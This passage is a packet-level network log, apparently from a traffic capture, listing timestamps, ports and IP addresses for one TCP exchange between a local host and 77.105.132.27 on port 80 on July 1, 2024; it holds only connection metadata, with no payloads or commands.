Jul 1, 2024 09:16:19.678693056 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.678704023 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.678719997 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.678726912 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.678738117 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.678740025 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.678776026 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.678814888 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.679650068 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.679665089 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.679678917 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.679694891 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.679711103 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.679714918 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.679727077 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.679739952 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.679754972 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.679758072 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.679769993 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.679775000 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.679785013 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.679789066 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.679800034 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.679815054 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.679821968 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.679831982 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.679852962 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.679856062 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.679877996 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.679883957 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.679898977 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.679914951 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.680727959 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.680747986 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.680764914 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.680783033 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.680790901 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.680797100 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.680815935 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.680826902 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.680831909 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.680849075 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.680850983 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.680862904 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.680866003 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.680881023 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.680888891 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.680895090 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.680903912 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.680922031 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.680937052 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.681639910 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.681657076 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.681683064 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.681709051 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.681723118 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.681736946 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.681744099 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.681751966 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.681761026 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.681772947 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.681787014 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.681796074 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.681803942 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.681817055 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.681822062 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.681835890 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.681847095 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.681849003 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.681864023 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.681879044 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.681881905 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.681902885 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.681919098 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.683079004 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.683094025 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.683109999 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.683125019 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.683140039 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.683140993 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.683161020 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.683166027 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.683183908 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.683202982 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.683203936 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.683219910 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.683221102 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.683237076 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.683254004 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.683259964 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.683269978 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.683286905 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.683291912 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.683303118 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.683314085 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.683317900 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.683341026 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.683370113 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.684936047 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.684953928 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.684969902 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.684986115 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.684990883 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.685003042 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.685017109 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.685018063 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.685033083 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.685049057 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.685053110 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.685066938 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.685072899 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.685082912 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.685097933 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.685116053 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.685117960 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.685132027 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.685148001 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.685169935 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.685197115 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.685219049 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.686355114 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.686372995 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.686386108 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.686424971 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.686458111 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.686501980 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.686517954 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.686534882 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.686547995 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.686556101 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.686563969 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.686587095 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.686588049 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.686604023 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.686603069 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.686619997 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.686629057 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.686634064 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.686646938 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.686650038 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.686666012 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.686666012 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.686681032 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.686683893 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.686696053 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.686713934 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.686733961 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.772130966 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.772193909 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.772207022 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.772233009 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.772277117 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.772349119 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.772362947 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.772377014 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.772388935 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.772397995 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.772428989 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.772751093 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.772763968 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.772774935 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.772785902 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.772794962 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.772797108 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.772819042 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.772850037 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.773001909 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.773013115 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.773027897 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.773039103 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.773055077 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.773066044 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.773076057 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.773078918 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.773089886 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.773101091 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.773113012 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.773121119 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.773123980 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.773130894 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.773147106 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.773197889 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.773950100 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.773962021 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.773972034 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.773983002 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.773994923 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.774005890 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.774010897 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.774017096 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.774028063 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.774039984 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.774043083 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.774086952 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.774533987 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.774549007 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.774563074 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.774575949 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.774585009 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.774591923 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.774605036 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.774609089 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.774622917 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.774633884 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.774638891 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.774661064 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.774683952 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.775342941 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.775358915 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.775373936 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.775396109 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.775397062 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.775413990 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.775418997 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.775425911 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.775441885 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.775449991 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.775456905 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.775470972 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.775479078 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.775487900 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.775504112 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.775506973 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.775521040 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.775526047 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.775536060 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.775551081 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.775552034 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.775568008 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.775583982 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.776262045 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.776278019 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.776295900 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.776303053 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.776312113 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.776325941 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.776325941 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.776345968 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.776348114 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.776365042 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.776374102 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.776377916 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.776391029 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.776401997 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.776407957 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.776422977 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.776432037 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.776438951 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.776441097 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.776453972 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.776475906 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.776500940 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.777062893 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.777080059 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.777122974 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.777143955 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.777169943 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.777188063 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.777204037 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.777223110 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.777230024 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.777240992 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.777256966 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.777260065 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.777273893 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.777293921 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.777293921 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.777312040 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.777312994 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.777327061 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.777334929 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.777352095 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.777369976 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.778218985 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.778235912 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.778250933 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.778264999 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.778270006 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.778280020 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.778287888 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.778295040 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.778311014 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.778326035 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.778335094 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.778342009 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.778341055 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.778352022 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.778363943 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.778367996 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.778384924 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.778386116 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.778399944 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.778409004 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.778424978 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.778451920 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.779154062 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.779172897 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.779186964 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.779201984 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.779211044 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.779221058 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.779223919 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.779236078 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.779249907 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.779259920 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.779266119 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.779274940 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.779283047 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.779305935 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.779311895 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.779323101 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.779331923 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.779350042 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.779381990 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.779381990 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.780050993 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.780067921 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.780081987 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.780088902 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.780097961 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.780109882 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.780113935 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.780124903 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.780128956 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.780147076 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.780148029 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.780158043 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.780163050 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.780179024 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.780183077 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.780193090 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.780200005 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.780249119 CEST	49752	80	192.168.2.4	77.105.132.27
